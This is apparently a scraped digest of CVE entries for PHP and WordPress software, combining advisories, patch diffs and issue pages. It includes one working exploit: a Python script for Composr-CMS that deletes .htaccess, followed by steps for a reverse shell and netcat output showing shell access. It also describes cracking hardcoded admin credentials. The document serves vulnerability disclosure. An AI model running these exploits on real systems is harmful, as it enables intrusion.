Tongda2000 v11.10 was discovered to contain a SQL injection vulnerability in export_data.php via the d_name parameter.

CVE-2022-23902

The CMP WordPress plugin before 4.0.19 allows any user, even not logged in, to arbitrarily change the coming soon page layout.

*   **cmp-coming-soon-maintenance/trunk/readme.txt**
    
    r2633406
    
    r2657597
    
     
    
    6
    
    6
    
    Requires PHP: 5.6
    
    7
    
    7
    
    Tested up to: 5.8
    
    8
    
     
    
    Stable tag: 4.0.18
    
     
    
    8
    
    Stable tag: 4.0.19
    
    9
    
    9
    
    License: GPLv2 or later
    
    10
    
    10
    
    License URI: https://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    161
    
    161
    
    162
    
    162
    
    \== Changelog ==
    
     
    
    163
    
    <h4>CMP 4.0.19 - 14-Jan-22</h4>
    
     
    
    164
    
    <ul>
    
     
    
    165
    
        <li>Fixed security issue, when unauthenticated user could update the CSS styles for CMP themes.</li>
    
     
    
    166
    
        <li>Updated purge caching function</li>
    
     
    
    167
    
    </ul>
    
    163
    
    168
    
    <h4>CMP 4.0.18 - 22-Nov-21</h4>
    
    164
    
    169
    
    <ul>

CVE-2022-0188: Changeset 2657597 for cmp-coming-soon-maintenance – WordPress Plugin Repository

Exposure of Sensitive Information to an Unauthorized Actor in Packagist pimcore/pimcore prior to 10.3.1.

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Svg sanitization (#11386)

\* setting up the svg saniziter on logo and assets upload

\* more detailed exception message

\* changed to mime type check instead of file extension

\* adding the sanitization to "Upload new version"

\* refactor to sanitize on preAdd/preUpdate, rollback AssetController.php

\* fix resource|string, null given on mime\_content\_type

\* using symfony mime component + small tweaks

\* avoiding save without changes case

\* tweak when checking if is image type

*   Loading branch information

CVE-2022-0565: Svg sanitization (#11386) · pimcore/pimcore@7697f70

Dairy Farm Shop Management System v1.0 was discovered to contain hardcoded credentials in the source code which allows attackers access to the control panel if compromised.

Exploit Title: Dairy Farm Shop Management System  — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access

**Date: 2020–12-25****Exploit Author: VIVEK PANDAY    ****Vendor Homepage: https://phpgurukul.com/****Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/****Version: 1.0****Tested on: Windows 10****Linkedln Contact: https://www.linkedin.com/in/vivek-panday-796768149/****CVE:2020-36062**

**\[ Hardcoded Credentials:\]**

Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non-encrypted) passwords and other secrets (SSH Keys, DevOps secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk.

**\[Attack Vectors\]**

An attacker can gain admin panel access using default credentials and do malicious activities

**Proof Of Concept**

1 Download source code from https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/

2 Now unzip it and go to the Database folder here we can see one SQL file.

3 Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.  
Mitigation:Always use a strong encryption algorithm like SHA-256 with SALT.Never use default credentials always change during installation time

CVE-2020-36062: CVE:2020-36062 Dairy Farm Shop Management System — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access · Issue #3 · VivekPanday12/CVE-

Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/contact.php via the txtMsg parameters.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-24646: VULNERABLE: SQL Injection  exists in Hospital-Management-System. An attacker can inject query in “/Hospital-Management-System-master/contact.php" via the ‘txtMsg’ parameters. · Issue #18 · kishan0725/

Authenticated remote code execution (RCE) in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a PHP shell through /adminzone/index.php?page=admin-commandr.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39

\# Remote Code Execution in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a php shell.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 12th January,2022

\# CVE ID: CVE-2021-46360

\# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS

\# Vendor: https://compo.sr/download.htm

###############################################

#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr

#!/usr/bin/python3

import requests

from bs4 import BeautifulSoup

import time

cookies \= {

'has\_cookies': '1',

'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic

'commandr\_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',

'last\_visit': '1641783779',

'cms\_session\_\_b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic

}

headers \= {

'Connection': 'keep-alive',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',

'Content-Type': 'application/x-www-form-urlencoded',

'Accept': '\*/\*',

'Origin': 'http://192.168.56.116',

'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',

'Accept-Language': 'en-US,en;q=0.9',

}

params \= (

('keep\_session', 'ef14cc258d93a'), #You need to change this as it is dynamic

)

data \= {

'\_data': 'command=rm .htaccess', \# This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)

'csrf\_token': 'ef14cc258d93a' #You need to change this as it is dynamic

}

r \= requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep\_session=ef14cc258d93a', headers\=headers, params\=params, cookies\=cookies, data\=data, verify\=False)

soup \= BeautifulSoup(r.text, 'html.parser')

#datap=response.read()

print (soup)

#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell (

#Step 3 Now visit http://IP\_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:

┌─\[ci@parrot\]─\[~\]

└──╼ $nc \-lvvnp 4444

listening on \[any\] 4444 ...

connect to \[192.168.56.103\] from (UNKNOWN) \[192.168.56.116\] 58984

Linux CVE\-Hunting\-Linux 5.11.0\-44\-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux

13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm\-x\-session \-\-run\-script env GNOME\_SHELL\_SESSION\_MODE\=ubuntu /usr/bin/gnome\-session \-\-systemd \-\-session\=ubuntu

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

/bin/sh: 0: can't access tty; job control turned off

$ whoami

daemon

$ id

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

$ pwd

/

$

CVE-2021-46360: 0days/Exploit.py at main · sartlabs/0days

m1k1o/blog is a lightweight self-hosted facebook-styled PHP blog. Errors from functions `imagecreatefrom*` and `image*` have not been checked properly. Although PHP issued warnings and the upload function returned `false`, the original file (that could contain a malicious payload) was kept on the disk. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.

Errors from functions imagecreatefrom* and image* have not been checked properly. Although PHP issued warning and function returned false, original file (that could contain malicious payload) was kept on the disk.

**Impact**

All versions until v1.3.

**Patches**

Users should upgrade to v1.4.

CVE-2022-23626: Insufficient checking of uploaded files

The Ultimate Product Catalog WordPress plugin before 5.0.26 does not have authorisation and CSRF checks in some AJAX actions, which could allow any authenticated users, such as subscriber to call them and add arbitrary products, or change the plugin's settings for example

CVE-2021-24993: Changeset 2650578 – WordPress Plugin Repository

The IP2Location Country Blocker WordPress plugin before 2.26.5 does not have authorisation and CSRF checks in the ip2location_country_blocker_save_rules AJAX action, allowing any authenticated users, such as subscriber to call it and block arbitrary country, or block all of them at once, preventing users from accessing the frontend.

**ip2location-country-blocker/trunk/ip2location-country-blocker.php**

r2644207

r2652469

 

4

4

 \* Plugin URI: https://ip2location.com/resources/wordpress-ip2location-country-blocker

5

5

 \* Description: Block visitors from accessing your website or admin area by their country.

6

 

 \* Version: 2.26.4

 

6

 \* Version: 2.26.5

7

7

 \* Author: IP2Location

8

8

 \* Author URI: https://www.ip2location.com.

…

…

 

1635

1635

        }

1636

1636

1637

 

        // Ignore static files

1638

 

        if (preg\_match('/\\.(7z|apk|avi|avif|bin|bmp|bz2|class|css|csv|dmg|doc|docx|ejs|eot|eps|exe|flac|gif|gz|ico|iso|jar|jpeg|jpg|js|mid|midi|mkv|mp3|mp4|ogg|otf|pdf|pict|pls|png|ppt|pptx|ps|rar|svg|svgz|swf|tar|tif|tiff|ttf|webm|webp|woff|woff2|xls|xlsx|zip|zst)$/i', $\_SERVER\['REQUEST\_URI'\])) {

1639

 

            return;

1640

 

        }

1641

 

1642

 

        // Ignore internal XHR calls

1643

 

        if (preg\_match('/wp-json|admin-ajax|wc-ajax|jm-ajax|doing\_wp\_cron/', $\_SERVER\['REQUEST\_URI'\])) {

1644

 

            return;

 

1637

        // Ignore internal XHR & cron

 

1638

        if (isset($\_SERVER\['SCRIPT\_NAME'\])) {

 

1639

            if (in\_array(basename($\_SERVER\['SCRIPT\_NAME'\]), \['admin-ajax.php', 'ajax.php', 'cron.php', 'wp-cron.php'\])) {

 

1640

                return;

 

1641

            }

1645

1642

        }

1646

1643

…

…

 

1893

1890

        header('Content-Type: application/json');

1894

1891

 

1892

        if (!current\_user\_can('administrator')) {

 

1893

            die(json\_encode(\[

 

1894

                'status'  => 'ERROR',

 

1895

                'message' => \_\_('Permission denied.', 'ip2location-country-blocker'),

 

1896

            \]));

 

1897

        }

 

1898

1895

1899

        require\_once ABSPATH . 'wp-admin/includes/file.php';

1896

1900

        WP\_Filesystem();

…

…

 

2046

2050

        header('Content-Type: application/json');

2047

2051

 

2052

        if (!current\_user\_can('administrator')) {

 

2053

            die(json\_encode(\[

 

2054

                'status'  => 'ERROR',

 

2055

                'message' => \_\_('Permission denied.', 'ip2location-country-blocker'),

 

2056

            \]));

 

2057

        }

 

2058

2048

2059

        require\_once ABSPATH . 'wp-admin/includes/file.php';

2049

2060

        WP\_Filesystem();

…

…

 

2195

2206

        header('Content-Type: application/json');

2196

2207

 

2208

        if (!current\_user\_can('administrator')) {

 

2209

            die(json\_encode(\[

 

2210

                'status'  => 'ERROR',

 

2211

                'message' => \_\_('Permission denied.', 'ip2location-country-blocker'),

 

2212

            \]));

 

2213

        }

 

2214

2197

2215

        try {

2198

2216

            $token = (isset($\_POST\['token'\])) ? $\_POST\['token'\] : '';

…

…

 

2246

2264

    public function save\_rules()

2247

2265

    {

 

2266

        if (!current\_user\_can('administrator')) {

 

2267

            wp\_die(\_\_('Permission denied.', 'ip2location-country-blocker'));

 

2268

        }

 

2269

2248

2270

        $mode = (isset($\_POST\['mode'\])) ? $\_POST\['mode'\] : '';

2249

2271

        $countries = (isset($\_POST\['countries'\])) ? $\_POST\['countries'\] : '';

**ip2location-country-blocker/trunk/readme.txt**

r2644207

r2652469

 

6

6

Requires at least: 2.0

7

7

Tested up to: 5.8

8

 

Stable tag: 2.26.4

 

8

Stable tag: 2.26.5

9

9

10

10

Blocks unwanted visitors from accessing your frontend (blog pages) or backend (admin area) by countries or proxy servers.

…

…

 

89

89

90

90

\== Changelog ==

 

91

\* 2.26.5 Fixed security issues with CSRF.

91

92

\* 2.26.4 Removed missing Javascript.

92

93

\* 2.26.3 Updated default blocking template.

CVE-2021-25095: Changeset 2652469 – WordPress Plugin Repository

Twig is an open source template language for PHP. When in a sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code. Patched versions now disallow calling non Closure in the `sort` filter as is the case for some other filters. Users are advised to upgrade.

Expand Up @@ -237,7 +237,7 @@ public function getFilters() // array helpers new TwigFilter('join', 'twig\_join\_filter'), new TwigFilter('split', 'twig\_split\_filter', \['needs\_environment' => true\]), new TwigFilter('sort', 'twig\_sort\_filter'), new TwigFilter('sort', 'twig\_sort\_filter', \['needs\_environment' => true\]), new TwigFilter('merge', 'twig\_array\_merge'), new TwigFilter('batch', 'twig\_array\_batch'), new TwigFilter('column', 'twig\_array\_column'), Expand Down Expand Up @@ -926,7 +926,7 @@ function twig\_reverse\_filter(Environment $env, $item, $preserveKeys = false) \* \* @return array \*/ function twig\_sort\_filter($array, $arrow = null) function twig\_sort\_filter(Environment $env, $array, $arrow = null) { if ($array instanceof \\Traversable) { $array = iterator\_to\_array($array); Expand All @@ -935,6 +935,8 @@ function twig\_sort\_filter($array, $arrow = null) }  
if (null !== $arrow) { twig\_check\_arrow\_in\_sandbox($env, $arrow, 'sort', 'filter');  
uasort($array, $arrow); } else { asort($array); Expand Down Expand Up @@ -1606,9 +1608,7 @@ function twig\_array\_filter(Environment $env, $array, $arrow) throw new RuntimeError(sprintf('The "filter" filter expects an array or "Traversable", got "%s".', \\is\_object($array) ? \\get\_class($array) : \\gettype($array))); }  
if (!$arrow instanceof Closure && $env\->hasExtension('\\Twig\\Extension\\SandboxExtension') && $env\->getExtension('\\Twig\\Extension\\SandboxExtension')->isSandboxed()) { throw new RuntimeError('The callable passed to "filter" filter must be a Closure in sandbox mode.'); } twig\_check\_arrow\_in\_sandbox($env, $arrow, 'filter', 'filter');  
if (\\is\_array($array)) { return array\_filter($array, $arrow, \\ARRAY\_FILTER\_USE\_BOTH); Expand All @@ -1620,9 +1620,7 @@ function twig\_array\_filter(Environment $env, $array, $arrow)  
function twig\_array\_map(Environment $env, $array, $arrow) { if (!$arrow instanceof Closure && $env\->hasExtension('\\Twig\\Extension\\SandboxExtension') && $env\->getExtension('\\Twig\\Extension\\SandboxExtension')->isSandboxed()) { throw new RuntimeError('The callable passed to the "map" filter must be a Closure in sandbox mode.'); } twig\_check\_arrow\_in\_sandbox($env, $arrow, 'map', 'filter');  
$r = \[\]; foreach ($array as $k => $v) { Expand All @@ -1634,9 +1632,7 @@ function twig\_array\_map(Environment $env, $array, $arrow)  
function twig\_array\_reduce(Environment $env, $array, $arrow, $initial = null) { if (!$arrow instanceof Closure && $env\->hasExtension('\\Twig\\Extension\\SandboxExtension') && $env\->getExtension('\\Twig\\Extension\\SandboxExtension')->isSandboxed()) { throw new RuntimeError('The callable passed to the "reduce" filter must be a Closure in sandbox mode.'); } twig\_check\_arrow\_in\_sandbox($env, $arrow, 'reduce', 'filter');  
if (!\\is\_array($array)) { if (!$array instanceof \\Traversable) { Expand All @@ -1648,4 +1644,11 @@ function twig\_array\_reduce(Environment $env, $array, $arrow, $initial = null)  
return array\_reduce($array, $arrow, $initial); }  
function twig\_check\_arrow\_in\_sandbox(Environment $env, $arrow, $thing, $type) { if (!$arrow instanceof Closure && $env\->hasExtension('\\Twig\\Extension\\SandboxExtension') && $env\->getExtension('\\Twig\\Extension\\SandboxExtension')->isSandboxed()) { throw new RuntimeError(sprintf('The callable passed to the "%s" %s must be a Closure in sandbox mode.', $thing, $type)); } } }

Tag

#php